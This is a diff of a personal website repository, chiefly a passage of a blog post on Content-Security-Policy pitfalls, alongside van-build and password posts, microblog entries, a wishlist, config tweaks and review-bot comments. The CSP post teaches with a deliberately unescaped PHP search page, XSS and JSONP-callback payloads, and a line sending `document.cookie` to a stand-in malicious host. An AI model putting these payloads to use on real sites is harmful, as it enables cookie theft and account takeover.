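+being in the `default-src` directive.
+
+You can further customize the CSP header to suit your website's specific needs.
+For example, you might want to allow images to be loaded from a content delivery
+network (CDN), or allow fonts from a third-party font provider. Here's an
+example of a more comprehensive CSP header:
+
+```
+Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com; style-src 'self' https://cdn.example.com; img-src 'self' https://cdn.example.com; font-src 'self' https://fonts.gstatic.com
+```
+
+In this example, we've added directives for styles, images, and fonts, allowing
+them to be loaded from specific approved sources.
+
+It's important to note that implementing CSP is an iterative process. You'll
+likely need to adjust your policy as you add new features and functionality to
+your website. A good approach is to start with a strict policy and gradually
+loosen it as needed, while keeping security as the top priority.
+
+Whilst testing, it may be useful to use the
+[content-security-policy-report-only](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only)
+header. Whilst it doesn't provide any protection, it also won't break an
+existing site as it only reports report violations, rather than blocking them.
+
+## Why Bother
+
+So, we have an idea of how to set a CSP, but not why we may want to. The main
+reason to have a strong CSP set is to protect against injection attacks. The
+most common of these is cross-site-scripting, where JavaScript is injected;
+although other types do exist when injecting malicious css (style-injection), or
+images (image-injection). The example below explains one way in which script
+injection, or cross-site-scripting, is bad.
+
+Take the following simple PHP search page:
+
+```php
+<!DOCTYPE html>
+<html>
+<head>
+<title>Vulnerable Search Page</title>
+</head>
+<body>
+<h1>Search Our Website</h1>
+<form method="GET" action="/search.php">
+Search: <input type="text" name="search">
+<input type="submit" name="submit" value="Search">
+</form>
+
+<?php
+if(isset($_GET['search'])) {
+echo "<h2>You searched for: " . $_GET['search'] . "</h2>";
+}
+
+//Some logic to display search results
+?>
+</body>
+</html>
+```
+
+The important factor here is that the users search query (`$_GET['search']`) is
+output verbatim, without encoding or sanitising it.
+
+If I perform a search for `<script>alert(1);</script>`, the following h2 tag will be sent to the browser:
+
+```
+<h2>You searched for: <script>alert(1);</script></h2>
+```
+
+The browser will see that, and interpret the script tag as a script it should
+execute. `alert(1)` is a relatively benign function that we often use to
+demonstrate the issue exists, without causing significant issues to the site.
+However, now imagine changing `alert(1)` for
+`fetch('https://malicious-site.com?c=' + document.cookie)`.
+
+Now my cookies have been sent to a malicious site for the owner to do with as
+they please.
+
+The content-security-policy can be use to add a layer of protection here. When
+set strictly, the browser can "know" that the script tag in the h1 tag isn't on
+a pre-approved list, so the browser won't execute it.
+
+## Potential Mistakes
+
+So, now we know why you might want a CSP, and how to set one, we'll look at some
+of the most common mistakes I see people make.
+
+### `'unsafe-inline'` source
+
+This source is very frequently added to a CSP, without realising it severely
+limits the protection that it can offer. Most online generators will add it as,
+in their current setup, most sites use inline resources. An inline resource is,
+as the name suggests, most script or style resources that are not external.
+
+So,
+
+```html
+<script>console.log("Inline");</script>
+<img src="something.jpg" onclick="console.log('Also Inline')" />
+<script src="/not-inline.js"></script>
+
+<style>
+body{
+background-color: red; /*inline*/
+}
+</style>
+<img style="background-color: red; /*also inline*/" />
+<link rel="stylesheet" href="/not-inline.css" />
+```
+
+The problem here is that, more often than not, inline JS is the easiest way to
+achieve XSS. The search example we used earlier added an inline script tag, so
+a CSP with unsafe-inline would not have prevented it from executing.
+
+There are a number of better options here. First is externalising scripts. So,
+moving inline JS into an external file and adding it to the allow-list.
+
+If that isn't possible, or practical, another option is to use the special
+`<hashtype>-<hash>` sources, or `nonce-<nonce>` sources. These allow you to add
+specific inline scripts to the allow-list, without allowing all inline scripts.
+Just make sure not to fall into the [potential mistakes with nonce
+sources](#nonce-source).
+
+### `'unsafe-eval'` source
+
+The unsafe-eval source is only relevant for JavaScript, and allows scripts to
+run `eval()`, and a couple of other similar functions. The most common use for
+eval I've seen is when targeting older JS environments that not have native
+JSON support as an alternative to `JSON.parse()`.
+
+So, consider the following:
+
+```js
+const jsonString = document.getElementById('someTextArea').value;
+const jsonObject = eval(jsonString2 );
+```
+
+If the contents of the text area were:
+
+```json
+{
+"name": "Jane Doe",
+"age": 25
+}
+```
+
+then:
+
+```
+console.log(jsonObject.name); // Output: "Jane Doe"
+```
+
+However, if the contents of the text area were `alert(1)`, then we are in the
+situation again whereby unsafe JavaScript is being executed. Unfortunately,
+there are a lot of different uses of eval, so a "fix" for all of them is
+unlikely. However, most modern frameworks do not need to use eval, so disabling
+it is preferable if possible.
+
+### Nonce source
+
+The nonce source allows site maintainers to allow some inline sources to be
+included. We've been using JavaScript as examples, so I will continue to do so,
+but note that this is also relevant for CSS.
+
+```
+Content-Security-Policy: script-src 'nonce-uph5Fai4'
+```
+
+```
+<!DOCTYPE html>
+<html>
+<head>
+<title>Example</title>
+<script nonce="uph5Fai4">
+console.log("This will run");
+</script>
+<script>
+console.log("This won't");
+</script>
+</head>
+<body>
+<h1>Our Website</h1>
+</body>
+</html>
+```
+
+For the nonce source to be effective, it must be unpractical for malicious actor
+to guess the nonce. In practice, this generally means using a long and random
+string of characters for each response. The nonce should not be re-used. If a
+malicious actor can guess what a nonce is, then they can simply add the
+attribute to their injected payload.
+
+### JSONP Sources
+
+JSONP (JSON with Padding) is a technique used to bypass the same-origin policy,
+which is a security feature implemented by web browsers to prevent a web page
+from making requests to a different domain than the one that served the web
+page.
+
+The way JSONP works is as follows:
+
+1. The client-side code defines a function, to processes JSON data.
+1. A `<script>` tag is created with its `src` attribute to a URL that returns a JSON response, with the name of the previously defined function specified.
+2. The server-side code wraps the JSON response in a function call, with the function name provided.
+
+Here's an example:
+
+Client-side HTML:
+
+```html
+<script>
+function handleResponse(data) {
+console.log(data);
+}
+</script>
+<script src="https://example.com/data?callback=handleResponse"></script>
+```
+
+The response to that data script would look something like:
+
+```javascript
+handleResponse({
+"name": "John Doe",
+"age": 30
+});
+```
+
+JSONP was a popular technique in the past, as it allowed developers to make
+cross-domain requests without running into the same-origin policy.
+
+However, if a user is able to inject a script tag into a document, and a CDN
+that is known to host JSONP endpoints is on the allow-list, they could include
+something like
+
+```html
+<script src="https://example.com/data?callback=alert(1);handleResponse"></script>
+```
+
+Most implementations will then return the following:
+
+```javascript
+alert(1);handleResponse({
+"name": "John Doe",
+"age": 30
+});
+```
+
+JSONP is now generally discouraged, in favour of
+[CORS](https://jakearchibald.com/2021/cors/), which allows site owners to
+explicitly allow some resources to be requested across origins. However, note
+that many CDNs host JSONP endpoints, so even if your site doesn't use them,
+allowing a domain that hosts them is enough to provide a CSP bypass in many
+situations. The CSP does allow sub directories or even specific files to be
+added to the allow-list, so if unsure about whether a CDN provides JSONP
+endpoints, you may wish to explicitly allow a specific file on the CDN, rather
+than all files.
+
+For example:
+
+```
+Content-Security-Policy: script-src http://example.com/file.js;
+```
+
+as opposed to
+
+```
+Content-Security-Policy: script-src http://example.com/;
+```
+
+### Domains Which Allow Uploads
+
+When you include a domain in your CSP, you're essentially giving control of your
+website's security to that platform and all the developers who publish code on
+it. Not only does this potentially introduce [supply chain
+attacks](https://thehackernews.com/2024/07/polyfillio-attack-impacts-over-380000.html),
+many CDNs also allow public submission. Unpkg, for instance, is a popular CDN
+that hosts everything on NPM. All you need to submit code to it is a free NPM
+account. If a CSP includes unpkg, or one of the many similar services, in their
+CSP; anyone can submit code that the CSP will allow to run.
+
+#### Self source
+
+It is worth noting that the `'self'` keyword can introduce a similar issue.
+
+The `'self'` source is a shortcut to allow sources from
+the current [origin](https://developer.mozilla.org/en-US/docs/Glossary/Origin).
+
+The difference between origin and site has been discussed [elsewhere in more
+detail](https://jakearchibald.com/2021/cors/#origins-vs-sites), but briefly, an
+origin is defined by scheme (protocol), hostname (domain), and port of the url.
+Sub domains are a different origin, although often the same same site.
+
+```
+https://example.jonathanh.co.uk:443/something/cool
+│ │
+└────────────Origin───────────────┘
+
+https://example.jonathanh.co.uk:443/something/cool
+│ │
+└────Site─────┘
+```
+
+Normally, including `'self'` is safe, although care should be taken if you allow
+users of your site to upload content, and that content is accessible on the same
+origin. If so, a user could potentially upload a malicious file and bypass the
+CSP as the file is available under the `'self'` domain.
+
+
+### Other Permissive Sources
+
+The following are considered permissive. I won't go into too much detail for
+each, but ideally you should avoid using:
+
+* `https:` - Any source that is hosted on an encrypted server. A malicious actor
+can very easily spin up a server with a valid certificate
+* `data:` - Any source that can be loaded via a data scheme. In most cases, this
+just involves base64 encoding a payload.
+
+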
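Review bot: The XSS walkthrough says the browser sees "the script tag in the h1 tag", but the post's own example injects into the `<h2>` that echoes the search term, so it should read `the script tag in the h2 tag`. Two more slips in the same file: the opening paragraph loses its verb at `from which resources This helps prevent` (read `from which resources may be loaded. This helps prevent`), and the eval example references an undefined `jsonString2` where `eval(jsonString)` is meant. In the JSONP section the per-file example uses `http://example.com/file.js`; `https://` would match the rest of the post, and it is worth one sentence noting that CSP only matches the path on the initial request — after a redirect only the origin is compared — so a per-file allow-list narrows the JSONP exposure rather than removing it.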
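--- a/content/blog/022-new-van.md
+++ b/content/blog/022-new-van.md
@@ -0,0 +1,158 @@
+---
+title: I Got a Van
+date: 2024-08-24
+tags:
+- Van Build
+description: >
+I've bought a van. I'm planning on converting it to a camper and documenting
+the process here.
+---
+
+So, as you've probably gathered from the title, I've bought a van. Or, at least,
+reserved it, I actually pick it up in a couple of weeks. It's a 2019 Fiat Ducato
+L4H2 which means it's long and quite tall.
+
+There will be 3 of us using the van. Me, my wife, and our lurcher, Rumple. One
+of the biggest requirements we have is that the van is both comfortable and safe
+for him to live and travel in. We have some ideas and thoughts around this, but
+you will hopefully see what that looks like in future posts.
+
+My plan is to convert this van into a camper. This first post is mainly a brain
+dump, for me as much as anyone else, about my current plans. Many will change,
+some may be scrapped all together.
+
+We are not planning on living in the van. However, it would be nice if we can go
+away for prolonged trips in it. Maybe a month or 6 weeks at a time. Obviously,
+we will use it for shorter weekend breaks, but we don't want to be limited
+to a week or so at a time. As a result, we should be able to work from the van.
+
+We are in a very fortunate position that my wife and I both work from home for
+the vast majority of the time. As a result, as long as we have a reasonable
+internet connection and electricity, we can both work.
+
+Obviously, if we are both working off laptops, and potentially with additional
+monitors, or power consumption is likely to be on the higher end. The electrical
+system in the van will definitely be a separate blog post, but at the moment, it
+looks like we'll be going for [LiFePO_4_
+batteries](https://en.wikipedia.org/wiki/Lithium_iron_phosphate_battery).
+Hopefully with 2 or 3 solar panels on the roof, as well as DC to DC charging so
+we can charge the batteries whilst driving. We will probably also add a shore
+power hookup, but that may come further down the line.
+
+For the internet side of things, I plan to mount a 5G antenna on the roof.
+Despite the name, it should pick up all the Gs. I will be on the look out for a
+router that I can plug such an antenna into, preferably one that supports the
+something like OpenWRT.
+
+This brings me quite nicely onto my plans for the Van's network. I hate WiFi. It
+will be available in the van for all my ESP boards (more on that later), but if
+I'm working on my laptop, I want it plugged in with a cable. So, I will be
+running Ethernet in my van, as well as power and water and whatever else I need
+to make it into a camper. I won't be going overboard like I did in my house -
+weight is a consideration in a van and cables are heavy; but I will be running
+it to (as a minimum) the office space for me and my wife, and my van server.
+
+Van server? Yes, you heard (read?) that right. I'll be having a server in my
+van. I am not sure yet if I'll be going down the Pi route, or something like a
+Nuc, but I will be having a low-ish powered server in the van. This will run
+things like [Home Assistant](https://www.home-assistant.io/) (more on that in a
+bit), [PiHole](https://pi-hole.net/),
+[AudioBookShelf](https://www.audiobookshelf.org/),
+[WireGuard](https://www.wireguard.com/) and maybe a few other things.
+Importantly, I won't be using it to run things that need a lot of power - think
+Jellyfin, Ollama and such.
+
+Things might change. Obviously, with a server that can go on motorways, spinning
+hard drives are a no-go. So storage is likely to have to be solid state for
+everything. As a result, I won't really be using this for a NAS. Storage of
+photos and videos will still go to my home server in my house. But things like
+audiobooks and podcasts that I am likely to want to listen to on the go will be
+stored on the local network.
+
+So, I mentioned Home Assistant. I am a big fan of **some** smart home tech. For
+me to be a fan of it, it needs to run (or be made to run) locally. Being able to
+turn your lights on from your phone is great, but if the switch on the wall
+doesn't work without an internet connection, I'm not interested. In my house,
+all of our light switches have been flashed with [ESPHome](https://esphome.io/).
+This custom firmware allows the switch to be controlled via Home Assistant, but
+importantly, even if my network has some catastrophic failure, the button still
+works. In the van, the chances of no internet are likely to be high - even with
+a fancy antenna on the roof. So, requiring the internet is an absolute no go for
+me.
+
+That will probably mean a whole bunch of DIY devices. I should be able to quite
+easily make things like lighting smart. I would also like to think that things
+like water sensors for my fresh and waste water can be read by an ESP device.
+What will probably take a bit more work / experimentation will be plugging an
+ESP device into the vehicles CAN bus to see if I can read data from that. It
+would also be great to have things like celling fans and heaters controllable
+from Home Assistant.
+
+Talking of fans and heaters, it is probably worth me mentioning that I will be
+trying to keep costs down where possible - or at least prioritising where money
+is spent. I would much rather, for instance, buy a cheap [Chinese celing
+fan](https://www.aliexpress.com/item/1005007224984817.html) or [diesel
+heater](https://www.aliexpress.com/item/1005006359176237.html) so I can buy
+decent electronics from the likes of [Victron](https://www.victronenergy.com/).
+
+Of course, I'll be taking things like the fans apart to see if I can stick an
+ESP chip in them and control them with Home Assistant.
+
+With regard to cooking in the van, I'm currently undecided on the best course of
+action. I would like to go fully electric, with induction hobs and an electric
+oven. Obviously, this would mean I need even more batteries in the van, which
+will increase the weight even more. However, I think with the amount of driving
+we normally do, I should be able to keep batteries topped up from the vehicle's
+alternator. It is possible that we will keep a gas camping stove somewhere so
+that if we're caught out, we can still boil water and heat food. But I would
+rather avoid the added hassle of gas canisters and piping if I can.
+
+With regard to water, I would like to mount both fresh and waste water tanks
+under the van. I don't yet know how big they will be, and will probably be
+determined by weight restrictions. However, my plan is to fit a low powered
+immersion heater into these to prevent them freezing in the winter. I won't be
+using this to make hot water, just to keep the temperature of the water above
+freezing - again probably powered by an ESP chip.
+
+Hot water is a different story. I have seen many youtube van builders pipe their
+diesel heater's pipe to a heat exchanger to heat the water. I may do this, but I
+would also like to try and heat the water from the engine's coolant system. I
+haven't seen this done in a camper (I'm not suggesting it hasn't been done), but
+I have seen it done [on other
+vehicles](https://www.youtube.com/watch?v=LKmkqenpE5o).
+
+One thing I'm fairly sure I don't want in the van is a full sized shower. At
+least, not an internal one. Space is a premium in a van, and in my opinion, the
+space a shower takes up is unnecessary. I will probably add something like the
+[Bullfinch External Shower
+Point](https://camperwarehouse.co.uk/product/bullfinch-external-shower-point-white/),
+so we can have outdoor showers if we need them. But most of the time, I think
+we'll be able to make do with a flannel and a bowl of hot water. It does mean
+that the sink in the van will need to be big enough to wash our hair in. An
+added bonus of the external shower system is we'll be able to wash off Rumple
+before he gets in the van when he inevitably gets covered in mud.
+
+Only thing I haven't really touched upon is the planned layout. That will
+probably be my next blog post, but I plan to keep it quite simple. Bed at the
+back. Undecided yet on the orientation, and that will depend if I can sleep
+width ways once we've added the insulation. If I can't, and we end up making the
+bed go length ways, we will probably have an "almost" fixed bed, where the
+bottom foot or so is removable and is used as a back rest or something. This
+frees up some more space in the middle of the van during the day, but still
+means we don't need to make our bed each evening.
+
+The cab area will have swivel seats. This will make our main living / working
+area, and as a result, we won't have a separate "lounge". Again, space is at a
+premium in a van.
+
+Between the cab / living area and the bed will be our kitchen and toilet areas,
+as well as a spot for Rumple's bed. Importantly this will include a mounting
+point for his harness so he is secured whilst driving.
+
+Before I finish up, it's probably important that I clarify a few things. I will
+be learning as I go. I will be making mistakes and I will aim to share those
+with you. However, this "build log" will not be tutorials. I am not an
+electrician, so don't take electrical advice off me. Same for plumbing or
+carpentry or anything else for that matter. That being said, if you spot
+something I could be doing better, or an idea you think I might like, or just
+want to say hi, leave a comment by emailing `comments.new-van<at>jn.hn`.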
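--- a/content/blog/023-wallace-and-gromit-passwords.md
+++ b/content/blog/023-wallace-and-gromit-passwords.md
@@ -0,0 +1,56 @@
+---
+title: Passwords Most Fowl
+date: 2024-12-26
+tags:
+- Security
+description: >
+If you're like me, some of yesterday (Christmas 2024) was spent watching the
+new Wallace and Gromit. I wonder if like me it also got you thinking about
+password managers.
+---
+
+**Warning:** Contains Spoilers!
+
+If you caught the latest episode, "Vengeance Most Fowl," you know, they were
+once again up against the sneaky Feathers McGraw, who pulls off a pretty clever
+hack involving a "smart gnome." The twist? The gnome’s password was super easy
+to guess! While it's all in good fun, it’s a great reminder of why we should all
+be using password managers.
+
+In the episode, Feathers McGraw’s ability to crack the gnome's password
+highlights a real issue we face today: weak passwords. Let's be honest, are you
+still using simple passwords like birthdays or pets' names? Or maybe your pets
+name with a 1 and an exclamation mark? It’s way too easy for hackers to figure
+those out, and that puts our personal info at risk.
+
+Now, imagine if Wallace had a password manager. If he'd used it properly,
+he would've had strong, unique passwords for all his inventions and accounts.
+He could have even shared the passwords with his trusty companion.
+
+That would've made it nearly impossible for Feathers McGraw - or anyone else for
+that matter - to break into the gnomes. Or at least, not by guessing the
+passwords.
+
+I'd also like to draw attention to everything getting "smart" in our
+increasingly connected world, it seems like everything is getting a smart
+upgrade - from our fridges to our light bulbs, and even garden gnomes!
+
+While the convenience of smart devices can be appealing, there are some serious
+risks that come with connecting everything to the internet. In "Vengeance Most
+Fowl," the hacked smart gnome serves as a perfect example of how these devices
+can become vulnerabilities. When we connect everyday items to the internet, we
+open the door for hackers to exploit them, potentially gaining access to our
+personal information or even taking control of our homes.
+
+Whilst the gnomes in Wallace and Gromit were obviously over the top and comical,
+it's become the norm for everything from cameras to lawn mowers to be connected.
+
+Imagine a world where your smart gnome could be used to spy on you or trigger a
+series of unfortunate events, just like in the episode. The more devices we
+connect, the more points of entry there are for cybercriminals. Many of these
+smart devices come with default passwords or lack robust security features,
+making them easy targets. It's crucial to remember that while technology can
+make our lives easier, it also requires us to be vigilant about our security
+practices. By being mindful of what we connect to the internet and ensuring that
+we use strong passwords and security measures, we can enjoy the benefits of
+smart technology without falling victim to the dangers it can bring.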
@ -44,6 +44,8 @@ ${LRED}Jonathan Hodgson${NC}
${RED}CONTACT${NC}
${ORANGE}Email: ${GREEN}jonathan@jonathanh.co.uk${NC}
${ORANGE}Matrix: ${GREEN}@jonathan:jn.hn${NC}
${ORANGE}Mastodon: ${GREEN}@archie2870@mastodon.technology${NC}
${ORANGE}Dotfiles: ${GREEN}https://jn.hn/dots/${NC}
${ORANGE}Blog: ${GREEN}https://jn.hn${NC}
@ -10,11 +10,18 @@ I hate websites tracking me so I won't be tracking you if you visit my website.
* Bitcoin Wallet: 132AM5imvDiWXJQGfMiGBmvnfaChaUTaQ6
* PayPal Me: <https://paypal.me/jab2870>
## Amazon Associates Links
In some blog posts, I include links to products that are part of the [Amazon
Associates](https://affiliate-program.amazon.co.uk/) program. At no cost to you,
I receive a small commission based on any sales that are made using the link. I
would appreciate it if you could use these links when making purchases, although
understand fully if you choose not to. I will aim to include a non-associates
link along side the associates one.
## Indirectly
If you can't afford (or don't want) to support me, that's fine. The content I put out will always be freely available and without any form of tracking. There are some affiliate links you can use that I will get a kick back from. Be warned though, some of these services might track you - unfortunately that is out of my control. If you don't want them to, don't click the links.
* Lbry: <https://lbry.tv/$/invite/@jonathanh:7> - Lbry is a decentralised video sharing platform. By signing up with this link, they give me some of the crypto currency the platform is built around.
* Digital Ocean: <https://m.do.co/c/e6f44c36362f> - Digital ocean is a hosting platform. By using this link, you will get $100 to spend (it expires after 60 days). I will also get $25 if you use it.
* Smarty: <http://referme.to/KZ6bPZx> - (UK Only) If you sign up for Smarty sim card, we both get a free month.
* Curve: <http://www.curve.app/join#DWGGW26E> - All your cards in one. If you sign up, we each get £5
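--- a/content/microblog/1645562722
+++ b/content/microblog/1645562722
@@ -0,0 +1,4 @@
+---
+title: Tue 22 Feb 2022 20:45:22 GMT
+---
+I'm bad at blogging, let's see if I'm any better at micro-blogging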
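--- a/content/microblog/1645886681
+++ b/content/microblog/1645886681
@@ -0,0 +1,4 @@
+---
+title: Sat 26 Feb 2022 14:44:41 GMT
+---
+Back from a super wedding of close friends. Hopefully I'll be able to keep up an almost-daily micro blog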
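--- a/content/microblog/1646152089
+++ b/content/microblog/1646152089
@@ -0,0 +1,4 @@
+---
+title: Tue 1 Mar 2022 16:28:09 GMT
+---
+Why can I not make my QT apps look right? *sigh*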
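--- a/content/microblog/1646185440
+++ b/content/microblog/1646185440
@@ -0,0 +1,4 @@
+---
+title: Wed 2 Mar 2022 01:44:00 GMT
+---
+What a terrible journey. :( Home now, time for bed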
|
@ -9,13 +9,21 @@ I consume a lot more content than I produce. If you are interested in similar st
|
|||
|
||||
### HexDSL
|
||||
|
||||
Does a lot of videos on Linux gaming (not of much interest to me) but also does
|
||||
great videos on non-gaming linux content. *Side note:* He seems like a great guy
|
||||
on his discord server.
|
||||
Used to do a lot of videos on Linux. Those old videos still great. Now probably
|
||||
falls more under general interest.
|
||||
|
||||
*Side note:* He is a great guy. Got to meet him in real life and talk quite a
|
||||
bit on Discord.
|
||||
|
||||
* [Website](https://hexdsl.co.uk/)
|
||||
* [Youtube](https://www.youtube.com/channel/UCRE3NFNtdjR96-H4QG4U1Fg)
|
||||
|
||||
### Josuhua Crew
|
||||
|
||||
Lots of linux-y things
|
||||
|
||||
* [Website](https://www.joshuacrewe.co.uk/)
|
||||
|
||||
### Brodie Robertson
|
||||
|
||||
Videos about Linux and surrounding areas
|
||||
|
@ -29,12 +37,34 @@ Mostly videos on Vim and some tools he uses with Vim.
|
|||
* [Youtube](https://www.youtube.com/channel/UCXPHFM88IlFn68OmLwtPmZA)
|
||||
|
||||
|
||||
## Home Assistant / Smart Home
|
||||
|
||||
### 3Ative
|
||||
|
||||
Put ESPs in all the things. Very useful if you want to get into electronics.
|
||||
|
||||
*Side note*: Seems like a great guy in Discord!
|
||||
|
||||
* [Youtube](https://www.youtube.com/user/3ative)
|
||||
|
||||
### Speak to the Geek
|
||||
|
||||
Product reviews - focus on heating systems and energy, but covers other stuff.
|
||||
|
||||
* [Youtube](https://www.youtube.com/@SpeakToTheGeekTech)
|
||||
|
||||
### Self Hosted
|
||||
|
||||
Podcast about self hosting. Talks a lot about home automation.
|
||||
|
||||
* [Podcast](https://selfhosted.show/)
|
||||
|
||||
### Everything Smart Home
|
||||
|
||||
Mostly product reviews and home assistant tutorials
|
||||
|
||||
* [Youtube](https://www.youtube.com/@EverythingSmartHome)
|
||||
|
||||
## Security
|
||||
|
||||
### Darknet Diaries
|
||||
|
|
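--- a/content/wishlist.md
+++ b/content/wishlist.md
@@ -0,0 +1,64 @@
+---
+title: Wishlist
+---
+
+This is a list of things I'd like. I'll probably get around to getting some of
+them at some point. If you are looking to get me something, this might be a good
+place to look
+
+## Van
+
+
+
+## Smart Home
+
+### Door / window sensors (~£10 each)
+
+Eventually I'll want one on every window and door so duplicating these isn't a
+problem. I am not fussy about the brand. As long as it's zigbee
+
+<https://www.amazon.co.uk/Wireless-Smartphone-Security-Compatible-Batteries/dp/B08XB4WGSD/ref=sr_1_11?crid=3SJSCQKYEK2YE&keywords=zigbee+sonoff&qid=1658419177&sprefix=zigbee+sonoff%2Caps%2C92&sr=8-11>
+
+
+## 3d printing
+
+### Filament
+
+Basically any reputable brand. Esun, elagoo, sovol. I mostly use PLA. Sometimes
+it's sold as PLA+. Occasionally use PETG or TPU.
+
+Use black and navy blue most.
+
+<https://www.amazon.co.uk/eSUN-Filament-Dimensional-Accuracy-Printing/dp/B0834JNT5H/>
+
+## Coffee
+
+<https://www.youtube.com/watch?v=fsNpZzpgayY>
+
+<https://www.youtube.com/watch?v=yqgVGTuDMDc>
+
+
+### Arco Grinder (~£350)
+
+<https://goat-story.com/products/arco-coffee-grinder?variant=39636911292451>
+
+## Covert Companion (~$90)
+
+<https://covertinstruments.com/collections/ssf-bypass-bible/products/covert-companion-fully-loaded>
+
+### Expansion Pack
+
+<https://covertinstruments.com/collections/ssf-bypass-bible/products/covert-companion-turning-tool-expansion-pack>
+
+## Memory Sticks
+
+Below are examples. Get a reputable brand. I am yet to get "enough" memory
+sticks.
+
+<https://www.amazon.co.uk/SanDisk-Ultra-USB-Flash-Drive/dp/B00DQG9OZ2/ref=sr_1_3?crid=3K0MUL9W2C5FX&keywords=memory+stick&qid=1642086449&refinements=p_89%3ASanDisk&rnid=1632651031&s=computers&sprefix=memory+stick%2Caps%2C81&sr=1-3>
+
+<https://www.amazon.co.uk/Kingston-DT100G3-32GB-3P-DataTraveler-Drives/dp/B081PJQRYS/ref=sr_1_7?crid=3K0MUL9W2C5FX&keywords=memory+stick&qid=1642086475&refinements=p_89%3AKingston&rnid=1632651031&s=computers&sprefix=memory+stick%2Caps%2C81&sr=1-7>
+
+## Other random stuff
+
+Hacksmith mini saber: <https://hacksmith.store/en-gb/products/hacksmith-mini-saber?variant=39960182522026>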
@ -6,5 +6,16 @@ services:
|
|||
- "8080:80"
|
||||
volumes:
|
||||
- ./nginx:/etc/nginx/conf.d:ro
|
||||
- ./public_html:/usr/share/nginx/html:ro
|
||||
- ./public:/usr/share/nginx/html:ro
|
||||
- ./assets:/usr/share/nginx/assets:ro
|
||||
|
||||
gemini:
|
||||
image: adrianhesketh/gemini
|
||||
volumes:
|
||||
- ./public:/content:ro
|
||||
- ./gem-cert:/certs:ro
|
||||
environment:
|
||||
- PORT=1965
|
||||
- DOMAIN=jonathanh.co.uk
|
||||
ports:
|
||||
- "1965:1965"
|
||||
|
|
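Review bot: `image: adrianhesketh/gemini` on the new gemini service carries no tag or digest, so every pull resolves to whatever the publisher's default tag points at that day, and an upstream change or compromised push lands on this host unreviewed; pin it, `image: adrianhesketh/gemini:<TAG>` (placeholder; an `@sha256:<DIGEST>` pin is stricter), and bump it deliberately. The `- ./gem-cert:/certs:ro` mount puts the Gemini TLS key material in a directory beside the site sources; if `gem-cert` lives inside the checkout, confirm it is excluded from version control and readable only by the account that runs the stack, since `:ro` restricts the container, not the host. The `services:` block and the start of the nginx service are outside the hunk.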
|
@ -1,4 +1,4 @@
|
|||
include mime.types
|
||||
include mime.types;
|
||||
|
||||
types {
|
||||
text/markdown md;
|
||||
|
|